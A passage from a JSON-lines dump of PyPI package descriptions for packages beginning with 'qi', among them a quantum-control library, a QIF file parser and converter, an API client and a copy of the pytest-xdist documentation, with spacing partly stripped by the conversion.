outputRecording(cell, duration, offset, save_to, state_to)Performs a recording at the input of the cell of givendurationandoffset(electrical delay). Typically used directly after aPlayReadoutcommand. Withsave_to, the result data can be stored and labeled by the given string. Withstate_to, the obtained state can be saved to a QiVariable.Wait(cell, delay)Waits the givendelayin the execution time of thecellbefore continuing with the next command.QiVariable(type),QiTimeVariable()andQiStateVariable()Creates a variable that can be used during the control flow or to temporarily store a measured qubit state.Furthermore, there are context managers (which are used with thewithstatement) to represent control logic:with If(condition):Conditional branching, only executes the indented block that follows if the condition is true.with Else():Can follow afterwith Ifand does exactly what you would expect it to do.with ForRange(variable, start, end, step):The passedvariablewill be looped fromstarttoend(excluded) withstepincrements. The following idented block will be repeated for each value ofvariable.One nice thing about QiCode is that you can define reusable building blocks for your experiments. We call these QiGates and annotate them accordingly (@QiGate). Together with the property names of theQiSample, one can really reuse them for different qubits without any adaptations to the gates:@QiGatedefReadout(cell:QiCell,save_to:str=None):PlayReadout(cell,QiPulse(cell[\"rec_pulse\"],frequency=cell[\"rec_frequency\"]))Recording(cell,duration=cell[\"rec_length\"],offset=cell[\"rec_offset\"],save_to=save_to)@QiGatedefPiPulse(cell:QiCell):Play(cell,QiPulse(cell[\"pi\"],frequency=cell[\"manip_frequency\"]))@QiGatedefThermalize(cell:QiCell):Wait(cell,5*cell[\"T1\"])As with the basic commands, the QiGates typically start by defining the cell on which they act. This is not strictly required though. Furthermore, also multi-qubit gates can be implemented in the same manner acting on multiple cells.Now, one can define a first experiment. In QiCode, experiments are calledQiJoband written in an abstract way so they can be easily reused for different samples. Let us consider a Rabi experiment:# Commands are always encapsulated within the QiJob contextwithQiJob()asrabi:# First, we define how many qubits the experiment requiresq=QiCells(1)# Rabi consists of variable length excitation pulses,# so we need to create a time variablelength=QiTimeVariable()# The variable can then be changed within a for loopwithForRange(length,0,1e-6,20e-9):# Output the manipulation pulse with variable lengthPlay(q[0],QiPulse(length,frequency=q[0][\"manip_frequency\"]))# Perform a consecutive readout (using the above QiGate)# The data can later by accessed via the specified name \"result\"Readout(q[0],save_to=\"result\")# Wait for the qubit to thermalize (also a QiGate)Thermalize(q[0])TheQiCellsobject inside theQiJobonly acts as placeholder for the real qubit sample and will be replaced by it once we run the experiment.\nThe placeholder specifies how many cells/qubits the experiment is written for, so one in this case.\nAll cell properties that are needed for the Rabi experiment are already defined in oursampleabove where we just calibrated the readout.\nSo we can just run the job by passing bothQiControllerandQiSampleobject to it:rabi.run(qic,sample,averages=1000)data=rabi.cells[0].data(\"result\")This will execute the whole job including the for loop and repeat and average the whole experiment 1000 times. The resultingdataobject will look like this:[# Averaged I results (len = 50 in this example)np.array([...]),# Averaged Q results (same len)np.array([...])]Job description for the most common experiments are readily available asql.jobs.*functions, likeql.jobs.Rabiorql.jobs.T1.More information on QiCode can be foundhere.Qkit IntegrationThis package is best used together with the quantum measurement suiteQkitwhich has to be installed separately. Stand-alone usage of qiclib with reduced capabilities is also possible.After installation, convenience features like storing sample objects (seeqkit.measure.samples_class) and displaying progress bars within Jupyter(lab) notebooks are available.The following code demonstrates how both packages can be easily combined to perform a Rabi experiment (based on the code above):fromqkit.measure.timedomain.measure_tdimportMeasure_td# We use the rabi QiJob from above and extract an experiment object from itexp=rabi.create_experiment(qic,sample,averages=1000)# Create Qkit measurement object and pass an adapter object as Qkit samplem=Measure_td(exp.qkit_sample)m.set_x_parameters(exp.time_range(0,1e-6,20e-9),'pulse_length',None,'s')m.dirname='rabi'# Start the measurement, and lean back:m.measure_1D_AWG(iterations=1)Everything else is handled for you by Qkit and qiclib! Have fun performing your experiments.TestingTo execute test files use the command:$pytesttests--covContributingIdeas for new features and bug reports are highly welcome. Please use the issue tracker for this purpose.LICENSEqiclib is released under the terms of theGNU General Public Licenseas published by the Free Software Foundation, either version 3 of the License, or any later version.Please see theCOPYINGfiles for details."} +{"package": "qicna", "pacakge-description": "About pyQICpyQICis a python package for generating quasi-isodynamic stellarator configurations using an expansion about magnetic axis. pyQIC is written in pure python. This makes pyQIC user-friendly, with no need for compilation. though it is slower.This code implements the equations derived by Garren and Boozer (1991) for MHD equilibrium near the magnetic axis.RequirementspyQIChas minimal dependencies - it requires only python3, numpy, scipy, matplotlib. If you don't already have numpy, scipy and matplotlib, they will be installed automatically by thepip installstep in theRun the Codesection.USEFUL LINKSIf you need more help clickhereINSTALLATIONTo install the code you will need to follow the steps bellow:To install this code you will need to open your Shell and insert the following command:pip install .First of all you need to copy the folders and the files with the \"git clone\" command followed by the github repository's link.\nExample:git clone _link_Then intall the package to your local python environment with:cd pyQIC\npip install -eThen you also need to install the librarys below:numpyscipymatplotlibExample:pip install numpy scipy matplotlibRUN THE CODETo run this code you will need to use your Python and insert the following command:from qic import Qic\nstel = Qic.from_paper('r2 section 5.2')"} +{"package": "qi-compute-api-client", "pacakge-description": "compute-api-clientSorting and Pagination of list endpointsThe api provides sorting and pagination for list endpoints. The following parameters can be passed as query parameters to get sorted and paginated list. -latest-Type: Boolean. -Description: Get the most recently created object. Defaults to False. -sort_by-Type: String: -Description: The field / column name to sort on. To reverse sort provide the field with a \"-\" sign. E.g. \"created_on\" for ascending order while \"-created_on\" in descending order. Defaults to \"id\". -page_number-Type: Positive Integer -Description: The page number for pagination. Defaults to 1. -items_per_page-Type: Positive Integer. -Description: The number of items per page for pagination. Defaults to 50.Thecompute_api_clientpackage is automatically generated by theOpenAPI Generatorproject:API version: 0.1.0Package version: 1.0.0Build package: org.openapitools.codegen.languages.PythonClientCodegenRequirements.Python 3.7+Installation & UsageThis python library package is generated without supporting files like setup.py or requirements filesTo be able to use it, you will need these dependencies in your own package that uses this library:urllib3 >= 1.25.3python-dateutilaiohttppydanticGetting StartedIn your own code, to use this library to connect and interact with compute-api-client,\nyou can run the following:importtimeimportcompute_api_clientfromcompute_api_client.restimportApiExceptionfrompprintimportpprint# Defining the host is optional and defaults to http://localhost# See configuration.py for a list of all supported configuration parameters.configuration=compute_api_client.Configuration(host=\"http://localhost\")# The client must configure the authentication and authorization parameters# in accordance with the API server security policy.# Examples for each auth method are provided below, use the example that# satisfies your auth use case.# Configure API key authorization: userconfiguration.api_key['user']=os.environ[\"API_KEY\"]# Uncomment below to setup prefix (e.g. Bearer) for API key, if needed# configuration.api_key_prefix['user'] = 'Bearer'# Enter a context with an instance of the API clientasyncwithcompute_api_client.ApiClient(configuration)asapi_client:# Create an instance of the API classapi_instance=compute_api_client.AlgorithmsApi(api_client)algorithm_in=compute_api_client.AlgorithmIn()# AlgorithmIn |try:# Create algorithmapi_response=awaitapi_instance.create_algorithm_algorithms_post(algorithm_in)print(\"The response of AlgorithmsApi->create_algorithm_algorithms_post:\\n\")pprint(api_response)exceptApiExceptionase:print(\"Exception when calling AlgorithmsApi->create_algorithm_algorithms_post:%s\\n\"%e)Documentation for API EndpointsAll URIs are relative tohttp://localhostClassMethodHTTP requestDescriptionAlgorithmsApicreate_algorithm_algorithms_postPOST/algorithmsCreate algorithmAlgorithmsApidelete_algorithm_algorithms_id_deleteDELETE/algorithms/{id}Destroy algorithmAlgorithmsApiread_algorithm_algorithms_id_getGET/algorithms/{id}Retrieve algorithmAlgorithmsApiread_algorithms_algorithms_getGET/algorithmsList algorithmsAlgorithmsApiupdate_algorithm_algorithms_id_putPUT/algorithms/{id}Update algorithmBackendApicreate_backend_backends_postPOST/backendsCreate backendBackendApiread_backend_backends_id_getGET/backends/{id}Retrieve backendBackendApiread_backend_self_backends_me_getGET/backends/meRetrieve backendBackendApiread_backends_backends_getGET/backendsList backendsBackendApiupdate_backend_self_backends_me_patchPATCH/backends/meUpdate backendBackendTypesApiread_backend_type_backend_types_id_getGET/backend_types/{id}Retrieve backend typeBackendTypesApiread_backend_types_backend_types_getGET/backend_types/List backend typesBatchJobsApicreate_batch_job_batch_jobs_postPOST/batch_jobsCreate batch jobBatchJobsApienqueue_batch_job_batch_jobs_id_enqueue_patchPATCH/batch_jobs/{id}/enqueueEnqueue batch job for executionBatchJobsApifinish_batch_job_batch_jobs_id_finish_patchPATCH/batch_jobs/{id}/finishFinish batch jobBatchJobsApipeek_batch_job_batch_jobs_peek_patchPATCH/batch_jobs/peekPeek batch jobBatchJobsApipop_batch_job_batch_jobs_pop_patchPATCH/batch_jobs/popTake batch jobBatchJobsApiread_batch_jobs_batch_jobs_getGET/batch_jobsList batch jobsBatchJobsApiunpop_batch_job_batch_jobs_unpop_patchPATCH/batch_jobs/unpopTake batch jobCommitsApicreate_commit_commits_postPOST/commitsCreate commitCommitsApidelete_commit_commits_id_deleteDELETE/commits/{id}Destroy commitCommitsApiread_commit_commits_id_getGET/commits/{id}Get commit by IDCommitsApiread_commits_commits_getGET/commitsList commitsFilesApicreate_file_files_postPOST/filesCreate fileFilesApidelete_file_files_id_deleteDELETE/files/{id}Destroy fileFilesApiread_file_files_id_getGET/files/{id}Retrieve fileFilesApiread_files_files_getGET/filesList filesFinalResultsApicreate_final_result_final_results_postPOST/final_resultsCreate final resultFinalResultsApiread_final_result_by_job_id_final_results_job_job_id_getGET/final_results/job/{job_id}Retrieve final result by job IDFinalResultsApiread_final_result_final_results_id_getGET/final_results/{id}Retrieve final resultJobsApicreate_job_jobs_postPOST/jobsCreate jobJobsApidelete_job_jobs_id_deleteDELETE/jobs/{id}Destroy jobJobsApiread_job_jobs_id_getGET/jobs/{id}Retrieve jobJobsApiread_jobs_jobs_getGET/jobsList jobsJobsApiupdate_job_status_jobs_id_patchPATCH/jobs/{id}Update Job StatusLanguagesApiread_language_languages_id_getGET/languages/{id}Retrieve languageLanguagesApiread_languages_languages_getGET/languagesList languagesMembersApicreate_member_members_postPOST/membersCreate memberMembersApidelete_member_members_id_deleteDELETE/members/{id}Destroy memberMembersApiread_member_members_id_getGET/members/{id}Retrieve memberMembersApiread_members_members_getGET/membersList membersMetadataApicreate_metadata_self_metadata_postPOST/metadataCreate metadataMetadataApiread_metadata_by_backend_id_metadata_backend_backend_id_getGET/metadata/backend/{backend_id}Retrieve metadata by backend IDMetadataApiread_metadata_metadata_id_getGET/metadata/{id}Get metadata by IDPermissionsApiread_permission_group_permission_groups_id_getGET/permission_groups/{id}Retrieve permission groupsPermissionsApiread_permission_groups_permission_groups_getGET/permission_groups/List permission groupsPermissionsApiread_permission_permissions_id_getGET/permissions/{id}Retrieve permissionsPermissionsApiread_permissions_permissions_getGET/permissions/List permissionsProjectsApicreate_project_projects_postPOST/projectsCreate projectProjectsApidelete_project_projects_id_deleteDELETE/projects/{id}Destroy projectProjectsApipartial_update_project_projects_id_patchPATCH/projects/{id}Partially update projectProjectsApiread_project_projects_id_getGET/projects/{id}Retrieve projectProjectsApiread_projects_projects_getGET/projectsList projectsProjectsApiupdate_project_projects_id_putPUT/projects/{id}Update projectReservationsApicreate_reservation_reservations_postPOST/reservationsCreate reservationReservationsApiread_reservation_reservations_id_getGET/reservations/{id}Retrieve reservationReservationsApiread_reservations_reservations_getGET/reservationsList reservationsReservationsApiterminate_reservation_reservations_id_terminate_patchPATCH/reservations/{id}/terminateTerminate reservationResultsApicreate_result_results_postPOST/resultsCreate resultResultsApidelete_results_by_job_id_results_job_job_id_deleteDELETE/results/job/{job_id}Delete results by job IDResultsApiread_result_results_id_getGET/results/{id}Retrieve resultResultsApiread_results_by_job_id_results_job_job_id_getGET/results/job/{job_id}Retrieve results by job IDTeamsApiread_team_teams_id_getGET/teams/{id}Retrieve teamsTeamsApiread_teams_teams_getGET/teams/List teamsTransactionsApiread_transaction_transactions_id_getGET/transactions/{id}Retrieve transactionsTransactionsApiread_transactions_transactions_getGET/transactions/List transactionsUsersApicreate_user_users_postPOST/usersCreate userUsersApidelete_user_users_id_deleteDELETE/users/{id}Destroy userUsersApiread_user_users_id_getGET/users/{id}Retrieve userUsersApiread_users_users_getGET/usersList usersDocumentation For ModelsAlgorithmAlgorithmInAlgorithmTypeBackendBackendPatchBackendStatusBackendTypeBackendWithAuthenticationBatchJobBatchJobInBatchJobStatusCommitCommitInCompileStageDomainFileFileInFinalResultFinalResultInHTTPNotFoundErrorHTTPValidationErrorJobJobInJobPatchJobStatusLanguageLocationInnerMemberMemberInMetadataMetadataInPermissionPermissionGroupProjectProjectInProjectPatchReservationReservationInResultResultInRoleShareTypeTeamTransactionUserUserInValidationErrorDocumentation For AuthorizationAuthentication schemes defined for the API:userType: API keyAPI key parameter name: X-useridLocation: HTTP headerbackendType: API keyAPI key parameter name: AuthorizationLocation: HTTP headerAuthor"} +{"package": "qicore", "pacakge-description": "QiCore\u2014QiCore Python Module."} +{"package": "qidicom", "pacakge-description": "qidicom is a facade for DICOM file interaction. See thedocumentationfor more information."} +{"package": "qiea", "pacakge-description": "#README"} +{"package": "qieman-xdist", "pacakge-description": "xdist: pytest distributed testing pluginThepytest-xdistplugin extends pytest with some unique\ntest execution modes:test runparallelization: if you have multiple CPUs or hosts you can use\nthose for a combined test run. This allows to speed up\ndevelopment or to use special resources ofremote machines.--looponfail: run your tests repeatedly in a subprocess. After each run\npytest waits until a file in your project changes and then re-runs\nthe previously failing tests. This is repeated until all tests pass\nafter which again a full run is performed.Multi-Platformcoverage: you can specify different Python interpreters\nor different platforms and run tests in parallel on all of them.Before running tests remotely,pytestefficiently \u201crsyncs\u201d your\nprogram source code to the remote place. All test results\nare reported back and displayed to your local terminal.\nYou may specify different Python versions and interpreters.If you would like to know how pytest-xdist works under the covers, checkoutOVERVIEW.InstallationInstall the plugin with:pip install pytest-xdistTo usepsutilfor detection of the number of CPUs available, install thepsutilextra:pip install pytest-xdist[psutil]Speed up test runs by sending tests to multiple CPUsTo send tests to multiple CPUs, use the-n(or--numprocesses) option:pytest -n NUMCPUSPass-nautoto use as many processes as your computer has CPU cores. This\ncan lead to considerable speed ups, especially if your test suite takes a\nnoticeable amount of time.If a test crashes a worker, pytest-xdist will automatically restart that worker\nand report the test\u2019s failure. You can use the--max-worker-restartoption\nto limit the number of worker restarts that are allowed, or disable restarting\naltogether using--max-worker-restart0.By default, using--numprocesseswill send pending tests to any worker that\nis available, without any guaranteed order. You can change the test\ndistribution algorithm this with the--distoption. It takes these values:--distno: The default algorithm, distributing one test at a time.--distloadscope: Tests are grouped bymodulefortest functionsand byclassfortest methods. Groups are distributed to available\nworkers as whole units. This guarantees that all tests in a group run in the\nsame process. This can be useful if you have expensive module-level or\nclass-level fixtures. Grouping by class takes priority over grouping by\nmodule.--distloadfile: Tests are grouped by their containing file. Groups are\ndistributed to available workers as whole units. This guarantees that all\ntests in a file run in the same worker.Making session-scoped fixtures execute only oncepytest-xdistis designed so that each worker process will perform its own collection and execute\na subset of all tests. This means that tests in different processes requesting a high-level\nscoped fixture (for examplesession) will execute the fixture code more than once, which\nbreaks expectations and might be undesired in certain situations.Whilepytest-xdistdoes not have a builtin support for ensuring a session-scoped fixture is\nexecuted exactly once, this can be achieved by using a lock file for inter-process communication.The example below needs to execute the fixturesession_dataonly once (because it is\nresource intensive, or needs to execute only once to define configuration options, etc), so it makes\nuse of aFileLockto produce the fixture data only once\nwhen the first process requests the fixture, while the other processes will then read\nthe data from a file.Here is the code:importjsonimportpytestfromfilelockimportFileLock@pytest.fixture(scope=\"session\")defsession_data(tmp_path_factory,worker_id):ifworker_id==\"master\":# not executing in with multiple workers, just produce the data and let# pytest's fixture caching do its jobreturnproduce_expensive_data()# get the temp directory shared by all workersroot_tmp_dir=tmp_path_factory.getbasetemp().parentfn=root_tmp_dir/\"data.json\"withFileLock(str(fn)+\".lock\"):iffn.is_file():data=json.loads(fn.read_text())else:data=produce_expensive_data()fn.write_text(json.dumps(data))returndataThe example above can also be use in cases a fixture needs to execute exactly once per test session, like\ninitializing a database service and populating initial tables.This technique might not work for every case, but should be a starting point for many situations\nwhere executing a high-scope fixture exactly once is important.Running tests in a Python subprocessTo instantiate a python3.5 subprocess and send tests to it, you may type:pytest -d --tx popen//python=python3.5This will start a subprocess which is run with thepython3.5Python interpreter, found in your system binary lookup path.If you prefix the \u2013tx option value like this:--tx 3*popen//python=python3.5then three subprocesses would be created and tests\nwill be load-balanced across these three processes.Running tests in a boxed subprocessThis functionality has been moved to thepytest-forkedplugin, but the--boxedoption\nis still kept for backward compatibility.Sending tests to remote SSH accountsSuppose you have a packagemypkgwhich contains some\ntests that you can successfully run locally. And you\nhave a ssh-reachable machinemyhost. Then\nyou can ad-hoc distribute your tests by typing:pytest -d --tx ssh=myhostpopen --rsyncdir mypkg mypkgThis will synchronize yourmypkgpackage directory\nto a remote ssh account and then locally collect tests\nand send them to remote places for execution.You can specify multiple--rsyncdirdirectories\nto be sent to the remote side.NoteFor pytest to collect and send tests correctly\nyou not only need to make sure all code and tests\ndirectories are rsynced, but that any test (sub) directory\nalso has an__init__.pyfile because internally\npytest references tests as a fully qualified python\nmodule path.You will otherwise get strange errorsduring setup of the remote side.You can specify multiple--rsyncignoreglob patterns\nto be ignored when file are sent to the remote side.\nThere are also internal ignores:.*, *.pyc, *.pyo, *~Those you cannot override using rsyncignore command-line or\nini-file option(s).Sending tests to remote Socket ServersDownload the single-modulesocketserver.pyPython program\nand run it like this:python socketserver.pyIt will tell you that it starts listening on the default\nport. You can now on your home machine specify this\nnew socket host with something like this:pytest -d --tx socket=192.168.1.102:8888 --rsyncdir mypkg mypkgRunning tests on many platforms at onceThe basic command to run tests on multiple platforms is:pytest --dist=each --tx=spec1 --tx=spec2If you specify a windows host, an OSX host and a Linux\nenvironment this command will send each tests to all\nplatforms - and report back failures from all platforms\nat once. The specifications strings use thexspec syntax.Identifying the worker process during a testNew in version 1.15.If you need to determine the identity of a worker process in\na test or fixture, you may use theworker_idfixture to do so:@pytest.fixture()defuser_account(worker_id):\"\"\" use a different account in each xdist worker \"\"\"return\"account_%s\"%worker_idWhenxdistis disabled (running with-n0for example), thenworker_idwill return\"master\".Worker processes also have the following environment variables\ndefined:PYTEST_XDIST_WORKER: the name of the worker, e.g.,\"gw2\".PYTEST_XDIST_WORKER_COUNT: the total number of workers in this session,\ne.g.,\"4\"when-n4is given in the command-line.The information about the worker_id in a test is stored in theTestReportas\nwell, under theworker_idattribute.Since version 2.0, the following functions are also available in thexdistmodule:defis_xdist_worker(request_or_session)->bool:\"\"\"Return `True` if this is an xdist worker, `False` otherwise\n\n :param request_or_session: the `pytest` `request` or `session` object\n \"\"\"defis_xdist_master(request_or_session)->bool:\"\"\"Return `True` if this is the xdist master, `False` otherwise\n\n Note: this method also returns `False` when distribution has not been\n activated at all.\n\n :param request_or_session: the `pytest` `request` or `session` object\n \"\"\"defget_xdist_worker_id(request_or_session)->str:\"\"\"Return the id of the current worker ('gw0', 'gw1', etc) or 'master'\n if running on the 'master' node.\n\n If not distributing tests (for example passing `-n0` or not passing `-n` at all) also return 'master'.\n\n :param request_or_session: the `pytest` `request` or `session` object\n \"\"\"Uniquely identifying the current test runNew in version 1.32.If you need to globally distinguish one test run from others in your\nworkers, you can use thetestrun_uidfixture. For instance, let\u2019s say you\nwanted to create a separate database for each test run:importpytestfromposix_ipcimportSemaphore,O_CREAT@pytest.fixture(scope=\"session\",autouse=True)defcreate_unique_database(testrun_uid):\"\"\" create a unique database for this particular test run \"\"\"database_url=f\"psql://myapp-{testrun_uid}\"withSemaphore(f\"/{testrun_uid}-lock\",flags=O_CREAT,initial_value=1):ifnotdatabase_exists(database_url):create_database(database_url)@pytest.fixture()defdb(testrun_uid):\"\"\" retrieve unique database \"\"\"database_url=f\"psql://myapp-{testrun_uid}\"returndatabase_get_instance(database_url)Additionally, during a test run, the following environment variable is defined:PYTEST_XDIST_TESTRUNUID: the unique id of the test run.Accessingsys.argvfrom the master node in workersTo access thesys.argvpassed to the command-line of the master node, userequest.config.workerinput[\"mainargv\"].Specifying test exec environments in an ini fileYou can use pytest\u2019s ini file configuration to avoid typing common options.\nYou can for example make running with three subprocesses your default like this:[pytest]addopts=-n3You can also add default environments like this:[pytest]addopts=--tx ssh=myhost//python=python3.5 --tx ssh=myhost//python=python3.6and then just type:pytest --dist=eachto run tests in each of the environments.Specifying \u201crsync\u201d dirs in an ini-fileIn atox.iniorsetup.cfgfile in your root project directory\nyou may specify directories to include or to exclude in synchronisation:[pytest]rsyncdirs=. mypkg helperpkgrsyncignore=.hgThese directory specifications are relative to the directory\nwhere the configuration file was found."} +{"package": "qieyun", "pacakge-description": "qieyun-pythonA Python library for the Qieyun phonological systemInstall$pipinstallqieyunDocumentationSeedocumentation."} +{"package": "qieyun-encoder", "pacakge-description": "qieyun-encoder-pythonA Python library for the operating the basic structure of the Qieyun phonological systemInstall$pipinstallqieyun-encoder"} +{"package": "qif", "pacakge-description": "libqifInstallpipinstallqifNeedspython>= 3.8 and asandybridgeor later CPUOn linuxpip>= 19 is needed (make sure topip install -U pip)A sample programfromqifimport*defcompute_bayes(C):pi=probab.uniform(C.shape[0])print(\"Channel:\\n\",C)print(\"Prior:\\n\",pi)print(\"Bayes vulnerability\",measure.bayes_vuln.posterior(pi,C))print(\"Bayes mult-capacity\",measure.bayes_vuln.mult_capacity(C))compute_bayes(channel.randu(5))# same, but using rational arithmeticqif.set_default_type(qif.rat)C=np.array([[rat(1,2),rat(1,4),rat(1,4)],[rat(1,6),rat(3,6),rat(2,6)],[rat(1,2),rat(1,2),rat(0)],])compute_bayes(C)DocumentationA list of methods provided byqifis availablehere.Use libqif with C++See theinstallation instructions."} +{"package": "qif2ofx", "pacakge-description": "qif2ofxConvert credit card transactions inQuicken Interchange format(QIF) toOpen Financial Exchange(OFX).\nUse this if you can only comfortably import OFX in your finance tool of choice. For example, I usebeancount-import(what an excellent tool!), but so far it only directly supports ingesting OFX. My bank decides to only distribute in QIF, so hence this (lazy) way of solving the problem.The converter assumes you have credit card transactions in your QIF, and not whatever else QIF can be used to represent, because that's my only use-case so far.InstallThe following provides the executableqif2ofxand the python libraryqif2ofx:pip install qif2ofxUsageOFX is a lot richer than QIF, from what I gathered from briefly looking atthe specification(don't, if you want to preserve your sanity. It hurts my eyes. Why did they make all the tags in capital letters). QIF is basically a list of transactions, without real context, while OFX offers rich descriptions of all sorts of financial concepts. Hell, QIF doesn't even have a concept of currency. Hence to convert our QIF input to OFX we need to provide a bunch of metadata:qif2ofx \\ \n # A glob expression, or path for that matter, of QIF files\n # we'd like to convert to OFX\n --glob \"path/to/**/*.qif\" \\\n\n # The currency we'd like to set in our OFX file. \n --currency GBP \\\n\n # Again, QIF has no notion of accounts, OFX does. Tools handling\n # OFX expect an account identifier so they can reconcile with\n # the appropriate account in the money management tool.\n --acctid puppiesThis is the bare minimum we need to generate a valid-ish OFX out of your QIF. You can set a few more options through the command line to control some details, seeqif2ofx --helpfor more details."} +{"package": "qifiaccount", "pacakge-description": "QIFIAccount"} +{"package": "qifimanager", "pacakge-description": "qifimanager"} +{"package": "qifparse", "pacakge-description": "QIF Parserqifparse is a parser for Quicken interchange format files (.qif).Even if the qif format is:quite old nownot supported for import by Quicken any more,ambiguous in some data management (notably on dates)it\u2019s still quite commonly used by many personal finance managers.UsageHere\u2019s a sample parsing:>>> from qifparse.parser import QifParser\n>>> qif = QifParser.parse(file('file.qif'))\n>>> qif.get_accounts()\n(, )\n>>> qif.accounts[0].name\n'My Cash'\n>>> qif.get_categories()\n(, )\n>>> qif.accounts[0].get_transactions()\n(, )\n>>> str(qif)\n'!Type:Cat\\nNfood\\nE\\n^\\nNfood:lunch\\nE\\n^\\n!Account\\nNMy Cash\\nTCash\\n^\\n!Type:Cash...\n...Here\u2019s a sample of a structure creation:>>> qif_obj = qif.Qif()\n>>> acc = qif.Account(name='My Cc', account_type='Bank')\n>>> qif_obj.add_account(acc)\n>>> cat = qif.Category(name='food')\n>>> qif_obj.add_category(cat)\n>>> tr1 = qif.Transaction(amount=0.55)\n>>> acc.add_transaction(tr1, header='!Type:Bank')\n\n>>> tr2 = qif.Transaction()\n>>> tr2.amount = -6.55\n>>> tr2.to_account = 'Cash'\n>>> acc.add_transaction(tr2)\n>>> acc.add(tr2)\n>>> str(qif_obj)\n'!Type:Cat\\nNfood\\nE\\n^\\n!Account\\nNMy Cc\\nTBank\\n^\\n!Type:Bank\\nD02/11/2013\\nT...\n...More infosFor more informations about qif format:http://en.wikipedia.org/wiki/Quicken_Interchange_Formathttp://svn.gnucash.org/trac/browser/gnucash/trunk/src/import-export/qif-import/file-format.txtChangelog0.5 (2013-11-03)now transactions can also be outside accountsmoved properties to method in order to accept filters0.4 (2013-11-02)address can be multilinessplit can have the address attributeadd support for Classesadd support for MemorizedTransaction0.3 (2013-11-02)more refactoring, now the lib is much more simple and engineeredimproved fields validation0.2 (2013-11-02)huge refactor, now the structure can be create and modified programmatically0.1 (2013-11-01)first release on Pypi"} +{"package": "qifparser", "pacakge-description": "QIF Parserqifparse is a parser for Quicken interchange format files (.qif).Even if the qif format is:quite old nownot supported for import by Quicken any more,ambiguous in some data management (notably on dates)it\u2019s still quite commonly used by many personal finance managers.UsageHere\u2019s a sample parsing:>>> from qifparse.parser import QifParser\n>>> qif = QifParser.parse(file('file.qif'))\n>>> qif.get_accounts()\n(, )\n>>> qif.accounts[0].name\n'My Cash'\n>>> qif.get_categories()\n(, )\n>>> qif.accounts[0].get_transactions()\n(, )\n>>> str(qif)\n'!Type:Cat\\nNfood\\nE\\n^\\nNfood:lunch\\nE\\n^\\n!Account\\nNMy Cash\\nTCash\\n^\\n!Type:Cash...\n...Here\u2019s a sample of a structure creation:>>> qif_obj = qif.Qif()\n>>> acc = qif.Account(name='My Cc', account_type='Bank')\n>>> qif_obj.add_account(acc)\n>>> cat = qif.Category(name='food')\n>>> qif_obj.add_category(cat)\n>>> tr1 = qif.Transaction(amount=0.55)\n>>> acc.add_transaction(tr1, header='!Type:Bank')\n\n>>> tr2 = qif.Transaction()\n>>> tr2.amount = -6.55\n>>> tr2.to_account = 'Cash'\n>>> acc.add_transaction(tr2)\n>>> acc.add(tr2)\n>>> str(qif_obj)\n'!Type:Cat\\nNfood\\nE\\n^\\n!Account\\nNMy Cc\\nTBank\\n^\\n!Type:Bank\\nD02/11/2013\\nT...\n...More infosFor more informations about qif format:http://en.wikipedia.org/wiki/Quicken_Interchange_Formathttp://svn.gnucash.org/trac/browser/gnucash/trunk/src/import-export/qif-import/file-format.txtChangelog0.6 (unreleased)fixed typo in account types0.5 (2013-11-03)now transactions can also be outside accountsmoved properties to method in order to accept filters0.4 (2013-11-02)address can be multilinessplit can have the address attributeadd support for Classesadd support for MemorizedTransaction0.3 (2013-11-02)more refactoring, now the lib is much more simple and engineeredimproved fields validation0.2 (2013-11-02)huge refactor, now the structure can be create and modified programmatically0.1 (2013-11-01)first release on Pypi"} +{"package": "qifqif", "pacakge-description": "qifqif/k\u012df k\u012df/:adj. inv.arabic slang (\u0643\u064a\u0641) for \u201cit\u2019s all the same\u201d.n.CLI tool forcategorizingqif files. It can make all the difference.DescriptionCLI tool toenrichyour QIF files transactions with category\ninformation, hencecutting down import time from minutes to mere\nseconds.QIF is a format widely used by personal money management software such\nasGnuCashto import information. Yet, the\nimport process is particularly tedious as it require to manually pair\nthe transactions contained in the file with categories (or \u201caccounts\u201d\nfor double-entry bookkeeping systems).qifqif augment your qif files by adding a category line for each\ntransaction, that additional information can then be used by accounting\nsoftware to perform automatic QIF imports. It picks categories by\nsearching for predefined keywords in transactions descriptions lines and\nby repeating choices you previously made regarding similar transactions.FeaturesQuickstart:create categories by importing your existing accounts\nwithqifaccBlazing fast edits:thanks to well-thought-out defaults andcompletionAuditing mode:review your transactions one by oneBatch mode (no interactive):for easy integration with scriptsEasy-going workflow:dreading the behemoth task of importing\nyears of accounting from a single file? Don\u2019t be. Go at your own pace\nand pressto exit anytime. On next run, editing will\nresume right where you left it.Usageusage: qifqif.py [-h] [-a | -b] [-c CONFIG] [-d] [-f] [-o DEST] [-v] QIF_FILE\n\nEnrich your .QIF files with tags. See https://github.com/Kraymer/qifqif for\nmore infos.\n\npositional arguments:\n QIF_FILE .QIF file to process\n\noptional arguments:\n -h, --help show this help message and exit\n -a, --audit-mode pause after each transaction\n -b, --batch-mode skip transactions that require user input\n -c CONFIG, --config CONFIG\n configuration filename in json format. DEFAULT:\n ~/.qifqif.json\n -d, --dry-run just print instead of writing file\n -f, --force discard transactions categories if not present in\n configuration file. Repeat the flag (-ff) to force\n editing of all transactions.\n -o DEST, --output DEST\n output filename. DEFAULT: edit input file in-place\n -v, --version display version information and exitMore infos on thedocumentationwebsite.Installationqiqif is written forPython 2.7+andPython\n3.5+.Install withpipviapip install qifqifcommand.ChangelogAvailable onGithub Releases\npage.FeedbacksPlease submit bugs and features requests on theIssue\ntracker."} +{"package": "qigeometry", "pacakge-description": "QiGeometry\u2014QiGeometry Python Module."} +{"package": "qi.Goban", "pacakge-description": "qi.Goban is a product for Go players and clubs. It allows you to add games as content, view them, comment on them, and add variations.Features:* Import games from the standard go format sgf version 4* Display ajax views of the game (using kss)* Supports full annotations, letters, triangles, etc.* Parse and add variations to games* Export pdf diagrams (using sgf2dg)* Automatic tagging according to the rank of the players"} +{"package": "qi.GRSplitter", "pacakge-description": "Introduction============The default plone/zope splitters do not properly work with greek text. This product removes accents from greek strings and properly replaces them with unicode, enabling your searches to work out of the box!Installation============If not using generic setup with plone:1) Create a ZCTextIndex Lexicon from ZMI2) Delete in the portal_catalog the indexes that contain greek text and recreate them using GRSplitter as a splitter.If you are using generic setup profiles, here is an example snippet to help you with catalog.xmlChangelog=========1.1.1----------------* egg-fix release1.1----------------* Initial release"} +{"package": "qihoo-for-t", "pacakge-description": "No description available on PyPI."} +{"package": "qihoo-for-test", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qiidly", "pacakge-description": "qiidly======[![Build 